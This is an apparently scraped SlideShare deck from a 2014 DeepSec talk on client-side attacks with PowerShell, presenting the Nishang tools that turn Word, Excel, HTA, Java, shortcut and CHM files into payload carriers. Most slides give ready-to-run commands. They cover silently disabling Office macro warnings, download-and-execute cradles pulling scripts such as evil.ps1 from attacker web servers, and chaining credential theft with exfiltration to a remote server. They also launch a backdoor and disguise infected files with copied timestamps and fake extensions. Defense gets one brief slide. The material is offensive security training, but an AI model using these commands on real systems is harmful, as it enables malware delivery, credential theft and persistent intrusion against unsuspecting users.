SlideShare a Scribd company logo
Lethal Client Side Attacks using 
PowerShell 
Nikhil Mittal
Get-Host 
• SamratAshok 
• Twitter - @nikhil_mitt 
• Blog – http://labofapenetrationtester.com 
• Creator of Kautilya and Nishang 
• Interested in Offensive Information Security, new attack 
vectors and methodologies to pwn systems. 
• Previous Talks 
– Clubhack’10, Hackfest’11, Clubhack’11, Black hat Abu Dhabi’11, 
Black Hat Europe’12, Troopers’12, PHDays’12, Black Hat USA’12, 
RSA China’12, EuSecWest’12, Troopers’13, Defcon’13, 
Troopers’14 
DeepSec 2014 2
Get-Content 
• Client Side Attacks 
• What is PowerShell 
• Why PowerShell? 
• Using PowerShell for client side attacks 
– Out-Word 
– Out-Excel 
– Out-Shortcut 
– Out-CHM 
– Out-Java 
– Out-HTA 
• Defense against such attacks. 
• Conclusion 
DeepSec 2014 3
“Of war, there is open war, 
concealed war and silent 
war…..one can prevail only by 
maintaining secrecy when 
striking again and again” 
– Chanakya 
DeepSec 2014 4
Client Side Attacks 
• Server side is being locked down like never 
before. There are protection measures, patching 
and extensive monitoring on the server side. 
Though, there is no dearth of vulnerabilities on 
the server side, exploiting those is getting more 
and more difficult. 
• I noticed unprecedented pace by clients while 
applying patches for HeartBleed, ShellShock etc. 
• There are higher chances to get noticed if we are 
using Server side attacks. 
DeepSec 2014 5
Client Side Attacks 
• The client side is still a lesser priority when it 
comes to patches, monitoring and other 
security measures. 
• The “perimeter-ized” network is still the norm. 
• I still found older versions of Adobe Reader on 
client machines during penetration tests. 
• There are less chances of getting caught if the 
attack begins from a user’s machine. 
DeepSec 2014 6
Client Side Attacks 
• Another thing which helps in the client side 
attacks is, when users use same credentials, 
data, servers, emails on daily basis, they tend 
to become casual about those. They cease to 
attach much importance to those things as 
they seem normal to them. 
DeepSec 2014 7
Client Side Attacks 
• It is still better not to use exploitation of 
memory corruption bugs in client side attacks. 
Generally, those are more prone to get caught. 
• It would be really nice if we are able to launch 
client side attacks with things built-in or native 
to the Operating System which we have to 
target. 
• This is where PowerShell comes in the picture. 
DeepSec 2014 8
What is PowerShell 
• “Windows PowerShell® is a task-based 
command-line shell and scripting language 
designed especially for system administration. 
Built on the .NET Framework, Windows 
PowerShell helps IT professionals and power 
users control and automate the administration of 
the Windows operating system and applications 
that run on Windows.” 
http://technet.microsoft.com/en-us/ 
library/bb978526.aspx 
DeepSec 2014 9
Why PowerShell 
• A shell and scripting language already present 
on the most general targets in a penetration 
test. 
• A powerful method to “reside” in the systems 
and network. 
• Provides easy access to .Net classes, WMI, 
Windows API, WinRM, Registry etc. 
• Less dependence on msf and *nix scripting 
scripts converted to executables. 
DeepSec 2014 10
Using PowerShell for Client Side 
Attacks 
• Using PowerShell in a client side attack results 
in impressive post exploitation. 
• We could not only have access to everything 
on the system very easily using PowerShell but 
also to other machines on the domain 
network. 
• That makes it an ideal script for such attacks. 
DeepSec 2014 11
Using PowerShell for Client Side 
Attacks 
• Lets begin with Microsoft Office Documents. 
DeepSec 2014 12
Out-Word.ps1 
• Use Out-Word to generate “armed” or 
“infected” MS Word documents. 
• The generated Word document has an auto 
executable macro which runs the provided 
PowerShell payload. 
• The PowerShell payload executes silently 
without affecting the normal usage of the 
Word document. 
DeepSec 2014 13
Out-Word.ps1 
• Below command generates a Word file, 
named Salary_Details.doc 
Out-Word -Payload 
"powershell.exe -ExecutionPolicy 
Bypass -noprofile -noexit -c 
Get-Process" 
• Though you would be unable to see the 
output in above example, lets see what 
happened. 
DeepSec 2014 14
Out-Word.ps1 
• Notice that we are not getting any warning regarding 
Macros when we open the Doc. Why? Because of these 
in the code 
New-ItemProperty -Path 
"HKCU:SoftwareMicrosoftOffice$($Wo 
rd.Version)wordSecurity" -Name 
AccessVBOM -Value 1 -Force | Out-Null 
New-ItemProperty -Path 
"HKCU:SoftwareMicrosoftOffice$($Wo 
rd.Version)wordSecurity" -Name 
VBAWarnings -Value 1 -Force | Out-Null 
DeepSec 2014 15
Out-Word.ps1 
• We have effectively disabled Word Macro 
Security on the computer where the script is 
executed. 
– So, if we execute the script on our system and 
send the files to the target, he will see the 
warning. 
– But, if the script is executed on the target 
computer, no such warning would be displayed. 
DeepSec 2014 16
Out-Word.ps1 
• The default payload with the script is to 
download and execute, in memory, a 
PowerShell script. Thus, the easiest way to use 
it is: 
Out-Word -PayloadURL 
http://yourwebserver.com/evil.ps 
1 
DeepSec 2014 17
Out-Word.ps1 
• The URL is passed to below code: 
powershell.exe -ExecutionPolicy 
Bypass -noprofile -c IEX ((New- 
Object 
Net.WebClient).DownloadString('$ 
PayloadURL'));$Arguments" 
DeepSec 2014 18
Out-Word.ps1 
• Note that we could also pass arguments to the 
script getting downloaded. For example: 
Out-Word -PayloadURL 
http://yourwebserver.com/evil.ps 
1 -Arguments Evil 
• This is useful when the script loads a function 
in memory or a PowerShell Module is used. 
• The Macro code uses WMI to create a process 
out of the payload we pass onto it. 
DeepSec 2014 19
Out-Word.ps1 
• Now, what if we get access to a fileserver and 
want to infect all files or files in a particular 
directory? Use below command: 
Out-Word -PayloadURL 
http://yourwebserver.com/evil.ps1 
-WordFileDir C:docfiles 
• In above, in the C:docfiles directory, macro 
enabled .doc files would be created for all the 
.docx files, with the same name and same 
LastWriteTime. 
DeepSec 2014 20
Out-Word.ps1 
• Use the –Recurse option to recursively 
generate .doc files in the docfiles directory 
Out-Word -PayloadURL 
http://yourwebserver.com/evil.ps 
1 -WordFileDir C:docfiles - 
Recurse 
• Use –RemoveDocx, to delete the original docx 
files after doc files have been generated. 
DeepSec 2014 21
Out-Word.ps1 
• LastWriteTime of the docx file is copied to the 
newly generate infected file to make it look 
auhtentic. 
• Also, if the file extensions for known file types 
are hidden. “.docx” is added to the generated 
doc files. 
DeepSec 2014 22
Out-Excel.ps1 
• Out-Excel works exactly same as Out-Word 
with same features, payloads etc. 
• I prefer Out-Excel, as in my experience, users 
are generally ok with Macros in Excel than in 
Word. 
DeepSec 2014 23
Out-HTA.ps1 
• Use this to generate HTML Application and 
accompanying VBScript. These could be 
deployed on a web server. 
• When a user opens the HTA, the VBScript is 
executed which, in turn, executes the 
specified PowerShell payload. 
DeepSec 2014 24
Out-HTA.ps1 
• The default name of the HTA is 
WindDef_WebInstall.hta and for VBS it is 
launchps.vbs 
• Both the files should be hosted in the same 
directory of a web server or the HTA should be 
modified to point to correct path of the VB 
Script. 
DeepSec 2014 25
Out-HTA.ps1 
• Use below command to generate the files: 
Out-HTA -Payload "powershell.exe - 
ExecutionPolicy Bypass -noprofile 
-noexit -c Get-ChildItem" 
• As in other client side attacks we discussed, you 
can also use a PowerShell Module 
Out-HTA -PayloadURL 
http://192.168.254.1/powerpreter.p 
sm1 -Arguments Check-VM 
DeepSec 2014 26
Out-Java.ps1 
• Out-Java could be used to execute PowerShell 
commands and scripts. 
• It outputs four files,a .java file which contains 
the Java source, a .class file which is the 
compiled Java class, a manifest.txt file and a 
JAR executable. 
• It needs JDK on the attacker’s machine. 
DeepSec 2014 27
Out-Java.ps1 
• Use below command: 
Out-Java -Payload "Get-Process" - 
JDKPath "C:Program 
FilesJavajdk1.7.0_25" 
• To download and execute a script in memory, use 
this: 
Out-Java -PayloadURL 
http://192.168.254.1/Get- 
Information.ps1 -JDKPath 
"C:Program 
FilesJavajdk1.7.0_25" 
DeepSec 2014 28
Out-Java.ps1 
• You could also use PowerShell Modules. 
Out-Java -PayloadURL 
http://192.168.254.1/powerpreter 
.psm1 -Arguments Check-VM - 
JDKPath "C:Program 
FilesJavajdk1.7.0_25" 
DeepSec 2014 29
Out-Shortcut.ps1 
• Out-Shortcut creates a shortcut (.lnk) which 
could be used for executing PowerShell 
commands and scripts. 
• When the target users clicks on the shortcut, 
which is set to PowerShell, the predefined 
command or script is executed. 
• The target user will see a window flash/open. 
DeepSec 2014 30
Out-Shortcut.ps1 
• Use below command to execute a PowerShell 
command: 
Out-Shortcut -Payload "-WindowStyle 
hidden -ExecutionPolicy Bypass - 
noprofile -noexit -c Get-ChildItem" 
• Use below command to download and execute, in 
memory, a PowerShell script: 
Out-Shortcut -PayloadURL 
http://192.168.254.1/Get-Wlan-Keys.ps1 
DeepSec 2014 31
Out-Shortcut.ps1 
• If Out-Shortcut is executed on the target, we 
can set a Hotkey for the shortcut so that ot 
executed everytime the key is pressed: 
Out-Shortcut -PayloadURL 
http://192.168.254.1/powerpreter 
.psm1 -Arguments Check-VM - 
HotKey 'F3' -Icon 'notepad.exe' 
DeepSec 2014 32
Out-CHM.ps1 
• We could also use Compiled HTML Help files 
(CHM) to execute PowerShell commands and 
scripts. 
• When the target opens the CHM file, the 
predefined command or script is executed. 
• The target user will see a window flash/open. 
DeepSec 2014 33
Out-CHM.ps1 
• Use below command to execute a PowerShell 
command 
Out-CHM -Payload "Get-Process" - 
HHCPath "C:Program Files 
(x86)HTML Help Workshop" 
DeepSec 2014 34
Out-CHM.ps1 
• Use below command to execute encoded 
command/script. 
Out-CHM -Payload "- 
EncodedCommand <>" -HHCPath 
"C:Program Files (x86)HTML 
Help Workshop" 
Use Invoke-Encode from Nishang for encoding. 
DeepSec 2014 35
Out-CHM.ps1 
• Use below command to download and 
execute a script in memroy. 
Out-CHM -PayloadURL 
http://192.168.254.1/Get- 
Information.ps1 -HHCPath 
"C:Program Files (x86)HTML 
Help Workshop" 
DeepSec 2014 36
More complex attacks 
• Any of the discussed, could be used for more 
effective attacks like: 
Out-Shortcut -PayloadURL 
http://192.168.254.1/powerpreter 
.psm1 -Arguments "Credentials | 
Do-Exfiltration –ExfilOption 
Webserver -URL 
http://192.168.254.183/test/data 
.php" 
DeepSec 2014 37
More complex attacks 
• We could do some really cool stuff, like 
running a backdoor with a new 
communications channel 
Out-Shortcut -PayloadURL 
“http://192.168.254.1/Gupt- 
Backdoor.ps1” –Arguments "Gupt-backdoor 
-MagicString op3n – 
Verbose” 
DeepSec 2014 38
More complex attacks 
• We could do Egress Testing 
Out-Shortcut -PayloadURL 
“http://192.168.254.1/FireBuster 
.ps1” –Arguments “FireBuster 
192.168.254.1 4443-4447” 
DeepSec 2014 39
More complex attacks 
• Other machines on the network could be port 
scanned. 
Out-Shortcut -PayloadURL 
“http://192.168.254.1/Port- 
Scan.ps1” –Arguments “Port-Scan - 
StartAddress 192.168.254.1 - 
EndAddress 192.168.254.254 - 
ResolveHost -ScanPort” 
• We could do a port scan for all the hosts in the 
current network segment, it is unlikely that we 
know the network range as in above example. 
DeepSec 2014 40
More complex attacks 
• We could also run other client side attacks. 
For example, lets infect every word file in the 
C:client directory 
Out-Shortcut -PayloadURL 
“http://192.168.254.1/Out- 
Word.ps1” –Arguments “Out-Word - 
PayloadURL 
http://192.168.254.1/Speak.ps1 - 
WordFileDir C:client” 
DeepSec 2014 41
More complex attacks 
• We could force browse or download and 
execute exploits to escalate privileges. 
• On Windows 8, we could dump web 
credentials stored in Windows Vault in plain 
text (admin privs required). 
• We could check if the current user has 
privileges to access other machines on the 
network. 
• And much more. 
DeepSec 2014 42
Defense 
• Use awareness is the best defense against 
such attacks. 
• Removal of VBA from MS Office would help 
with the office document attacks. But it could 
break so many things. 
• Active monitoring of the user machines may 
also help in detecting such attacks. 
DeepSec 2014 43
Conclusion 
• Usage of PowerShell makes these attacks 
much more lethal and powerful. 
• We need to not stick to getting a shell, we 
could go much further using only the client 
side attacks. 
• The attacks would continue as long as users 
continue opening attachments and click on 
links, that means, for ever :) 
DeepSec 2014 44
Recommended PowerShell Tools 
• Nishang 
• PowerSploit 
• Posh-SecMod 
• Veil-PowerView 
• PowerUp 
• PoshSec 
• Kansa 
• Voyeur 
• Powercat 
DeepSec 2014 45
Credits/Reference 
• Thanks to DeepSec for accepting me. 
• Macro code for MS Office documents has 
been taken from Matt’s work: 
https://github.com/enigma0x3 
• The idea for Out-CHM is taken from this tweet 
and attached file: 
https://twitter.com/ithurricanept/status/5349 
93743196090368 
DeepSec 2014 46
Thank You 
• Questions? 
• I am looking for contributors. 
• Nishang is available at 
https://github.com/samratashok/nishang 
• Follow me @nikhil_mitt 
• nikhil.uitrgpv@gmail.com 
• http://labofapenetrationtester.com/ 
47

More Related Content

What's hot

Introduction to Vault
Introduction to VaultIntroduction to Vault
Introduction to Vault
Knoldus Inc.
 
Sec013 その資格情報、簡
Sec013 その資格情報、簡Sec013 その資格情報、簡
Sec013 その資格情報、簡
Tech Summit 2016
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
Sqrrl
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
Nikhil Mittal
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
Getting Started in Pentesting the Cloud: Azure
Getting Started in Pentesting the Cloud: AzureGetting Started in Pentesting the Cloud: Azure
Getting Started in Pentesting the Cloud: Azure
Beau Bullock
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
コンテナイメージの脆弱性スキャンについて
コンテナイメージの脆弱性スキャンについてコンテナイメージの脆弱性スキャンについて
コンテナイメージの脆弱性スキャンについて
YASUKAZU NAGATOMI
 
Secret Management with Hashicorp’s Vault
Secret Management with Hashicorp’s VaultSecret Management with Hashicorp’s Vault
Secret Management with Hashicorp’s Vault
AWS Germany
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Rancher/Kubernetes入門ハンズオン資料~第2回さくらとコンテナの夕べ #さくらの夕べ 番外編
 Rancher/Kubernetes入門ハンズオン資料~第2回さくらとコンテナの夕べ #さくらの夕べ 番外編 Rancher/Kubernetes入門ハンズオン資料~第2回さくらとコンテナの夕べ #さくらの夕べ 番外編
Rancher/Kubernetes入門ハンズオン資料~第2回さくらとコンテナの夕べ #さくらの夕べ 番外編
Masahito Zembutsu
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
Benjamin Delpy
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAM
BGA Cyber Security
 

What's hot (20)

Introduction to Vault
Introduction to VaultIntroduction to Vault
Introduction to Vault
 
Sec013 その資格情報、簡
Sec013 その資格情報、簡Sec013 その資格情報、簡
Sec013 その資格情報、簡
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Getting Started in Pentesting the Cloud: Azure
Getting Started in Pentesting the Cloud: AzureGetting Started in Pentesting the Cloud: Azure
Getting Started in Pentesting the Cloud: Azure
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
コンテナイメージの脆弱性スキャンについて
コンテナイメージの脆弱性スキャンについてコンテナイメージの脆弱性スキャンについて
コンテナイメージの脆弱性スキャンについて
 
Secret Management with Hashicorp’s Vault
Secret Management with Hashicorp’s VaultSecret Management with Hashicorp’s Vault
Secret Management with Hashicorp’s Vault
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Rancher/Kubernetes入門ハンズオン資料~第2回さくらとコンテナの夕べ #さくらの夕べ 番外編
 Rancher/Kubernetes入門ハンズオン資料~第2回さくらとコンテナの夕べ #さくらの夕べ 番外編 Rancher/Kubernetes入門ハンズオン資料~第2回さくらとコンテナの夕べ #さくらの夕べ 番外編
Rancher/Kubernetes入門ハンズオン資料~第2回さくらとコンテナの夕べ #さくらの夕べ 番外編
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAM
 

Similar to Client side attacks using PowerShell

PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopers
Bryan Cafferky
 
PowerShell Defcon for Cybersecurity Topics
PowerShell Defcon for Cybersecurity TopicsPowerShell Defcon for Cybersecurity Topics
PowerShell Defcon for Cybersecurity Topics
Dev 010101
 
Adding Security and Compliance to Your Workflow with InSpec
Adding Security and Compliance to Your Workflow with InSpecAdding Security and Compliance to Your Workflow with InSpec
Adding Security and Compliance to Your Workflow with InSpec
Mandi Walls
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
EnclaveSecurity
 
Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...
Kangaroot
 
InSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.beInSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.be
Mandi Walls
 
Building Security into Your Workflow with InSpec
Building Security into Your Workflow with InSpecBuilding Security into Your Workflow with InSpec
Building Security into Your Workflow with InSpec
Mandi Walls
 
Rapidly prototyping web applications using BackPress
Rapidly prototyping web applications using BackPressRapidly prototyping web applications using BackPress
Rapidly prototyping web applications using BackPress
Nathaniel Taintor
 
Powershell training material
Powershell training materialPowershell training material
Powershell training material
Dr. Awase Khirni Syed
 
VMworld 2016: Getting Started with PowerShell and PowerCLI for Your VMware En...
VMworld 2016: Getting Started with PowerShell and PowerCLI for Your VMware En...VMworld 2016: Getting Started with PowerShell and PowerCLI for Your VMware En...
VMworld 2016: Getting Started with PowerShell and PowerCLI for Your VMware En...
VMworld
 
Drupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - DeployDrupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - Deploy
John Smith
 
InSpec For DevOpsDays Amsterdam 2017
InSpec For DevOpsDays Amsterdam 2017InSpec For DevOpsDays Amsterdam 2017
InSpec For DevOpsDays Amsterdam 2017
Mandi Walls
 
Open Audit
Open AuditOpen Audit
Open Audit
ncspa
 
DevOpsDaysRiga 2017: Mandi Walls - Building security into your workflow with ...
DevOpsDaysRiga 2017: Mandi Walls - Building security into your workflow with ...DevOpsDaysRiga 2017: Mandi Walls - Building security into your workflow with ...
DevOpsDaysRiga 2017: Mandi Walls - Building security into your workflow with ...
DevOpsDays Riga
 
KACE Agent Architecture and Troubleshooting Overview
KACE Agent Architecture and Troubleshooting OverviewKACE Agent Architecture and Troubleshooting Overview
KACE Agent Architecture and Troubleshooting Overview
Dell World
 
Extension Library - Viagra for XPages
Extension Library - Viagra for XPagesExtension Library - Viagra for XPages
Extension Library - Viagra for XPages
Ulrich Krause
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
VeilFramework
 
InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017
Mandi Walls
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
XPages -Beyond the Basics
XPages -Beyond the BasicsXPages -Beyond the Basics
XPages -Beyond the Basics
Ulrich Krause
 

Similar to Client side attacks using PowerShell (20)

PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopers
 
PowerShell Defcon for Cybersecurity Topics
PowerShell Defcon for Cybersecurity TopicsPowerShell Defcon for Cybersecurity Topics
PowerShell Defcon for Cybersecurity Topics
 
Adding Security and Compliance to Your Workflow with InSpec
Adding Security and Compliance to Your Workflow with InSpecAdding Security and Compliance to Your Workflow with InSpec
Adding Security and Compliance to Your Workflow with InSpec
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
 
Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...
 
InSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.beInSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.be
 
Building Security into Your Workflow with InSpec
Building Security into Your Workflow with InSpecBuilding Security into Your Workflow with InSpec
Building Security into Your Workflow with InSpec
 
Rapidly prototyping web applications using BackPress
Rapidly prototyping web applications using BackPressRapidly prototyping web applications using BackPress
Rapidly prototyping web applications using BackPress
 
Powershell training material
Powershell training materialPowershell training material
Powershell training material
 
VMworld 2016: Getting Started with PowerShell and PowerCLI for Your VMware En...
VMworld 2016: Getting Started with PowerShell and PowerCLI for Your VMware En...VMworld 2016: Getting Started with PowerShell and PowerCLI for Your VMware En...
VMworld 2016: Getting Started with PowerShell and PowerCLI for Your VMware En...
 
Drupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - DeployDrupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - Deploy
 
InSpec For DevOpsDays Amsterdam 2017
InSpec For DevOpsDays Amsterdam 2017InSpec For DevOpsDays Amsterdam 2017
InSpec For DevOpsDays Amsterdam 2017
 
Open Audit
Open AuditOpen Audit
Open Audit
 
DevOpsDaysRiga 2017: Mandi Walls - Building security into your workflow with ...
DevOpsDaysRiga 2017: Mandi Walls - Building security into your workflow with ...DevOpsDaysRiga 2017: Mandi Walls - Building security into your workflow with ...
DevOpsDaysRiga 2017: Mandi Walls - Building security into your workflow with ...
 
KACE Agent Architecture and Troubleshooting Overview
KACE Agent Architecture and Troubleshooting OverviewKACE Agent Architecture and Troubleshooting Overview
KACE Agent Architecture and Troubleshooting Overview
 
Extension Library - Viagra for XPages
Extension Library - Viagra for XPagesExtension Library - Viagra for XPages
Extension Library - Viagra for XPages
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
XPages -Beyond the Basics
XPages -Beyond the BasicsXPages -Beyond the Basics
XPages -Beyond the Basics
 

More from Nikhil Mittal

0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
Nikhil Mittal
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal
 
Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a Boss
Nikhil Mittal
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
Nikhil Mittal
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
Nikhil Mittal
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
Nikhil Mittal
 
Hacking the future with USB HID
Hacking the future with USB HIDHacking the future with USB HID
Hacking the future with USB HID
Nikhil Mittal
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
Nikhil Mittal
 

More from Nikhil Mittal (11)

0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
 
Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a Boss
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
 
Hacking the future with USB HID
Hacking the future with USB HIDHacking the future with USB HID
Hacking the future with USB HID
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
 

Recently uploaded

Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
Artificial Intelligence for XMLDevelopment
